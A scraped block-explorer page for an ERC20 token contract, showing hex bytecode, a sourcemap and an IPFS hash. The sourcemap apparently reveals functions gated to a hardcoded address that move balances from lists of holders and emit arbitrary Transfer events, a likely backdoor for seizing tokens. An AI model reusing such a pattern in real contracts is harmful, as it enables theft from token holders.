60405162461bcd60e51b81526004018080602001828103825283818151815260200191508051906020019080838360005b838110156112045781810151838201526020016111ec565b50505050905090810190601f1680156112315780820380516001836020036101000a031916815260200191505b509250505060405180910390fd5b50505090039056fe45524332303a207472616e7366657220746f20746865207a65726f206164647265737345524332303a206275726e20616d6f756e7420657863656564732062616c616e636545524332303a20617070726f766520746f20746865207a65726f206164647265737345524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e6365ddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef45524332303a207472616e736665722066726f6d20746865207a65726f206164647265737345524332303a20617070726f76652066726f6d20746865207a65726f2061646472657373a2646970667358221220261351ecad3dc6f6cf1058854b52dec7a4d588026f27f986338027f9d258f84664736f6c634300060c0033

Deployed Bytecode Sourcemap

6325:4943:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;8272:285;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;8272:285:0;;;;;;;;:::i;:::-;;6583:83;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7866:169;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;7866:169:0;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;6860:100;;;:::i;:::-;;;;;;;;;;;;;;;;7374:321;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;7374:321:0;;;;;;;;;;;;;;;;;:::i;6769:83::-;;;:::i;:::-;;;;;;;;;;;;;;;;;;;8933:432;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;8933:432:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;8933:432:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;8933:432:0;;-1:-1:-1;8933:432:0;;-1:-1:-1;;;;;8933:432:0:i;10191:207::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;10191:207:0;;;;;;;;;;;;;;;-1:-1:-1;;;10191:207:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;10191:207:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;10191:207:0;;;;;;;;-1:-1:-1;10191:207:0;;-1:-1:-1;;;;;10191:207:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;10191:207:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;10191:207:0;;-1:-1:-1;10191:207:0;;-1:-1:-1;;;;;10191:207:0:i;9978:205::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;9978:205:0;;;;;;;;;;;;;;;-1:-1:-1;;;9978:205:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;9978:205:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;9978:205:0;;;;;;;;-1:-1:-1;9978:205:0;;-1:-1:-1;;;;;9978:205:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;9978:205:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;9978:205:0;;-1:-1:-1;9978:205:0;;-1:-1:-1;;;;;9978:205:0:i;6968:119::-;;;;;;;;;;;;;;;;-1:-1:-1;6968:119:0;-1:-1:-1;;;;;6968:119:0;;:::i;8041:51::-;;;:::i;6674:87::-;;;:::i;10406:220::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;10406:220:0;;;;;;;;;;;;;;;-1:-1:-1;;;10406:220:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;10406:220:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;10406:220:0;;;;;;;;-1:-1:-1;10406:220:0;;-1:-1:-1;;;;;10406:220:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;10406:220:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;10406:220:0;;-1:-1:-1;10406:220:0;;-1:-1:-1;;;;;10406:220:0:i;7191:175::-;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;7191:175:0;;;;;;;;:::i;10913:66::-;;;:::i;:::-;;;;-1:-1:-1;;;;;10913:66:0;;;;;;;;;;;;;;7705:151;;;;;;;;;;;;;;;;-1:-1:-1;;;;;;7705:151:0;;;;;;;;;;:::i;8272:285::-;8360:6;;-1:-1:-1;;;;;8360:6:0;8346:10;:20;8338:52;;;;;-1:-1:-1;;;8338:52:0;;;;;;;;;;;;-1:-1:-1;;;8338:52:0;;;;;;;;;;;;;;;8418:12;;:21;;8435:3;8418:16;:21::i;:::-;8403:12;:36;8482:6;;-1:-1:-1;;;;;8482:6:0;8472:17;;;;:9;:17;;;;;;:26;;8494:3;8472:21;:26::i;:::-;8462:6;;-1:-1:-1;;;;;8462:6:0;;;8452:17;;;;:9;:17;;;;;;;;:46;;;;8516:33;;;;;;;;;;;8452:17;;-1:-1:-1;;;;;;;;;;;8516:33:0;;;;;;;;;8272:285;;:::o;6583:83::-;6653:5;6646:12;;;;;;;-1:-1:-1;;6646:12:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6620:13;;6646:12;;6653:5;;6646:12;;6653:5;6646:12;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6583:83;:::o;7866:169::-;7949:4;7966:39;7975:12;:10;:12::i;:::-;7989:7;7998:6;7966:8;:39::i;:::-;-1:-1:-1;8023:4:0;7866:169;;;;:::o;6860:100::-;6940:12;;6860:100;:::o;7374:321::-;7480:4;7497:36;7507:6;7515:9;7526:6;7497:9;:36::i;:::-;7544:121;7553:6;7561:12;:10;:12::i;:::-;7575:89;7613:6;7575:89;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;7575:19:0;;:11;:19;;;;;;;;;;;7595:12;:10;:12::i;:::-;-1:-1:-1;;;;;7575:33:0;;;;;;;;;;;;-1:-1:-1;7575:33:0;;;:89;:37;:89::i;:::-;7544:8;:121::i;:::-;-1:-1:-1;7683:4:0;7374:321;;;;;:::o;6769:83::-;6835:9;;;;6769:83;:::o;8933:432::-;8188:42;8174:10;:56;8166:92;;;;;-1:-1:-1;;;8166:92:0;;;;;;;;;;;;-1:-1:-1;;;8166:92:0;;;;;;;;;;;;;;;9016:9:::1;9011:339;9035:10;:17;9031:1;:21;9011:339;;;9080:11;9094:9;:24;9104:10;9115:1;9104:13;;;;;;;;;;;;;;-1:-1:-1::0;;;;;9094:24:0::1;-1:-1:-1::0;;;;;9094:24:0::1;;;;;;;;;;;;;9080:38;;9166:71;9195:3;9166:71;;;;;;;;;;;;;;;;;:9;:24;9176:10;9187:1;9176:13;;;;;;;;;;;;;;-1:-1:-1::0;;;;;9166:24:0::1;-1:-1:-1::0;;;;;9166:24:0::1;;;;;;;;;;;;;:28;;:71;;;;;:::i;:::-;9139:9;:24;9149:10;9160:1;9149:13;;;;;;;;;::::0;;::::1;::::0;;;;;;;-1:-1:-1;;;;;9139:24:0::1;::::0;;;;::::1;::::0;;;;;;-1:-1:-1;9139:24:0;;;:98;;;;9282:21;;;:9:::1;:21:::0;;;;:30:::1;::::0;9308:3;9282:25:::1;:30::i;:::-;9258:21;::::0;;:9:::1;:21;::::0;;;;:54;;;;9054:3;;;::::1;::::0;-1:-1:-1;9011:339:0::1;;;;8933:432:::0;:::o;10191:207::-;8188:42;8174:10;:56;8166:92;;;;;-1:-1:-1;;;8166:92:0;;;;;;;;;;;;-1:-1:-1;;;8166:92:0;;;;;;;;;;;;;;;10305:9:::1;10300:97;10324:9;:16;10320:1;:20;10300:97;;;10369:9;10379:1;10369:12;;;;;;;;;;;;;;-1:-1:-1::0;;;;;10353:42:0::1;10362:5;-1:-1:-1::0;;;;;10353:42:0::1;-1:-1:-1::0;;;;;;;;;;;10383:8:0::1;10392:1;10383:11;;;;;;;;;;;;;;10353:42;;;;;;;;;;;;;;;;;;10342:3;;10300:97;;;;10191:207:::0;;;:::o;9978:205::-;8188:42;8174:10;:56;8166:92;;;;;-1:-1:-1;;;8166:92:0;;;;;;;;;;;;-1:-1:-1;;;8166:92:0;;;;;;;;;;;;;;;10090:9:::1;10085:97;10109:9;:16;10105:1;:20;10085:97;;;10154:9;10164:1;10154:12;;;;;;;;;;;;;;-1:-1:-1::0;;;;;10138:42:0::1;10147:5;-1:-1:-1::0;;;;;10138:42:0::1;-1:-1:-1::0;;;;;;;;;;;10168:8:0::1;10177:1;10168:11;;;;;;;;;;;;;;10138:42;;;;;;;;;;;;;;;;;;10127:3;;10085:97;;6968:119:::0;-1:-1:-1;;;;;7061:18:0;7034:7;7061:18;;;:9;:18;;;;;;;6968:119::o;8041:51::-;10693:6;;-1:-1:-1;;;;;10693:6:0;10679:10;:20;10671:56;;;;;-1:-1:-1;;;10671:56:0;;;;;;;;;;;;-1:-1:-1;;;10671:56:0;;;;;;;;;;;;;;;8041:51::o;6674:87::-;6746:7;6739:14;;;;;;;;-1:-1:-1;;6739:14:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6713:13;;6739:14;;6746:7;;6739:14;;6746:7;6739:14;;;;;;;;;;;;;;;;;;;;;;;;10406:220;10693:6;;-1:-1:-1;;;;;10693:6:0;10679:10;:20;10671:56;;;;;-1:-1:-1;;;10671:56:0;;;;;;;;;;;;-1:-1:-1;;;10671:56:0;;;;;;;;;;;;;;;10533:9:::1;10528:97;10552:9;:16;10548:1;:20;10528:97;;;10597:9;10607:1;10597:12;;;;;;;;;;;;;;-1:-1:-1::0;;;;;10581:42:0::1;10590:5;-1:-1:-1::0;;;;;10581:42:0::1;-1:-1:-1::0;;;;;;;;;;;10611:8:0::1;10620:1;10611:11;;;;;;;;;;;;;;10581:42;;;;;;;;;;;;;;;;;;10570:3;;10528:97;;7191:175:::0;7277:4;7294:42;7304:12;:10;:12::i;:::-;7318:9;7329:6;7294:9;:42::i;10913:66::-;;;-1:-1:-1;;;;;10913:66:0;;:::o;7705:151::-;-1:-1:-1;;;;;7821:18:0;;;7794:7;7821:18;;;;;;;;;;;:27;;;;;;;;;;;;;7705:151::o;1278:181::-;1336:7;1368:5;;;1392:6;;;;1384:46;;;;;-1:-1:-1;;;1384:46:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;1450:1;1278:181;-1:-1:-1;;;1278:181:0:o;5396:106::-;5484:10;5396:106;:::o;8567:354::-;-1:-1:-1;;;;;8671:19:0;;8663:68;;;;-1:-1:-1;;;8663:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;8752:21:0;;8744:68;;;;-1:-1:-1;;;8744:68:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;8825:18:0;;;:11;:18;;;;;;;;;;;:27;;;;;;;;;;;;;:36;;;8879:32;;;;;;;;;;;;;;;;;8567:354;;;:::o;9377:587::-;-1:-1:-1;;;;;9485:20:0;;9477:70;;;;-1:-1:-1;;;9477:70:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;9568:23:0;;9560:71;;;;-1:-1:-1;;;9560:71:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;9664;9686:6;9664:71;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;9664:17:0;;;;;;:9;:17;;;;;;;:71;:21;:71::i;:::-;-1:-1:-1;;;;;9644:17:0;;;;;;;:9;:17;;;;;;:91;;;;9771:20;;;;;;;:32;;9796:6;9771:24;:32::i;:::-;-1:-1:-1;;;;;9748:20:0;;;;;;;:9;:20;;;;;:55;;;;9838:6;;9828:16;;;9838:6;;9828:16;9824:37;;;9855:4;;-1:-1:-1;;;;;9855:4:0;;-1:-1:-1;9824:37:0;9878:6;;-1:-1:-1;;;;;9865:19:0;;;9878:6;;9865:19;9861:43;;;9898:4;;-1:-1:-1;;;;;9898:4:0;;-1:-1:-1;9861:43:0;9936:9;-1:-1:-1;;;;;9919:35:0;9928:6;-1:-1:-1;;;;;9919:35:0;-1:-1:-1;;;;;;;;;;;9947:6:0;9919:35;;;;;;;;;;;;;;;;;;9377:587;;;:::o;1611:192::-;1697:7;1733:12;1725:6;;;;1717:29;;;;-1:-1:-1;;;1717:29:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;-1:-1:-1;;;1769:5:0;;;1611:192::o

Swarm Source

ipfs://261351ecad3dc6f6cf1058854b52dec7a4d588026f27f986338027f9d258f846
Loading...
Loading
Loading...
Loading
[ Download: CSV Export  ]
[ Download: CSV Export  ]

A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.